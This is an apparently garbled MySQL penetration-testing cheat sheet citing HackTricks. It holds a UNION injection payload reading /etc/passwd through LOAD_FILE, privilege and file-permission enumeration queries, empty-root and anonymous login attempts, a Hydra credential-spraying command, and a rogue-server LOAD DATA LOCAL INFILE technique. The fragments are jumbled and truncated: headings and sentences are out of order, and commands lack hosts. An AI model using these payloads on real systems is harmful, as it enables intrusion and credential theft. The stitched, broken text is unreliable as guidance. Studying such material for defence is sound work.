If secure_file_priv permits, local files can be read using LOAD_FILE():

UNION SELECT 1, LOAD_FILE('/etc/passwd'), 3-- -

Writing Files (Achieving RCE via Web Shell)

: Restrict write access to the plugin_dir folder at the operating system level, ensuring the mysql runtime user cannot dynamically add unverified .so or .dll components.

SELECT version();   -- MySQL version (5.x vs 8.x matters)
SELECT user();      -- Current user
SELECT database();  -- Current DB
SELECT grantee, privilege_type FROM information_schema.user_privileges;
SHOW VARIABLES LIKE 'secure_file_priv';  -- Critical for file read/write
SHOW VARIABLES LIKE 'plugin_dir';        -- UDF location

If you find an application that allows you to specify an arbitrary remote MySQL server to connect to, you can host a rogue server. When the victim application connects to your rogue server, your server can issue a LOAD DATA LOCAL INFILE request back to the client.

On HackTricks, "verified" methods are those that have been tested and confirmed to work under specific configurations. Key informative areas covered include:

Extract MySQL credentials from mysql.user:

If writing files is too basic, the most powerful feature verified by HackTricks is .

: Techniques for escalating privileges within the database or leveraging database access to compromise the underlying host.

Verification and Community Trust

mysql-info: Fetches protocol version, thread ID, status flags, and capabilities.

The mysql_login module provides an efficient way to spray credentials across multiple targets simultaneously.

# Attempting an empty root login
mysql -u root -h -p''
# Attempting anonymous login
mysql -u "" -h

3. SQL Injection (SQLi) Enablers

# Using Hydra for fast credential spraying
hydra -L usernames.txt -P passwords.txt mysql

The Historical Authentication Bypass (CVE-2012-2122)